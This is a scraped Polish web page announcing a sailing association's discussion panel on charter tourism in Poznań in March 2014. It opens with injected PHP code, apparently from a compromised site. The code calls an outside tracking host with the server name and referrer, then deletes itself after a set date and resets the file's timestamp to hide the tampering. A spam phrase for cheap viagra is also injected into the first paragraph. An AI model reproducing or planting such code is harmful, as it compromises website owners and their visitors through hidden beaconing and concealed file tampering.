check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Panel dyskusyjny WOZŻ

Panel dyskusyjny WOZŻ

Wielkopolski Okręgowy Związek Żeglarski serdecznie zaprasza na viagra cheap free shipping inaugurację paneli dyskusyjnych poświęconych żeglarstwu. Prelekcje (prezentacje) będą odbywać się w siedzibie WOZŻ w Poznaniu, w której także znajduje się powstały niedawno Ośrodek Kultury Żeglarskiej i Marynistycznej.

Szczegóły dotyczące najbliższego spotkania znajdują się w zakładce.

 Panel dyskusyjny

 Panel dyskusyjny

Wielkopolski Okręgowy Związek Żeglarski serdecznie zaprasza na inaugurację paneli dyskusyjnych poświęconych żeglarstwu. Prelekcje (prezentacje) będą odbywać się w siedzibie WOZŻ w Poznaniu, w której także znajduje się powstały niedawno Ośrodek Kultury Żeglarskiej i Marynistycznej.

W przyszłości zamierzamy organizować spotkania cyklicznie (skupiając się na sezonie zimowym, kiedy na takie imprezy jest najlepszy czas). Chcemy, aby otwarta forma spotkań pozwoliła jak największej ilości wielkopolskich żeglarzy na wzięcie udziału. Wspólnym mianownikiem jest ŻEGLARSTWO, a nie przynależność klubowa czy organizacyjna. Zapraszamy wszystkich zainteresowanych.

 

Panel dyskusyjny zainauguruje wystąpienie: "Żeglarska turystyka czarterowa - fakty i mity”. Prelegentem będzie jachtowy kapitan żeglugi wielkiej Marek Nowacki, profesor Akademii Wychowania Fizycznego w Poznaniu, a także czynny kapitan, instruktor oraz właściciel agencji czarterowej. Podzieli się z uczestnikami panelu informacjami o najpopularniejszych żeglarskich destynacjach turystycznych, sezonach, problemach jakie mogą spotkać czarterobiorcy przy czarterze jednostek. Po ok. 30 min. wystąpieniu gościa odbędzie się dyskusja na temat turystyki czarterowej wśród przybyłych osób. Jednym z podstawowych celów panelu jest wymiana poglądów. jkżw Marek Nowacki

 

Spotkanie odbędzie się w piątek 28.03.2014 początek godzina 19:00

Serdecznie zapraszamy do udziału,

Roman Bartkowiak & Tomasz Adamczyk

 

Panel dyskusyjny

Foto: T. Adamczyk (archiwum)

Poprawiony (Sobota, 22 Marzec 2014 20:00)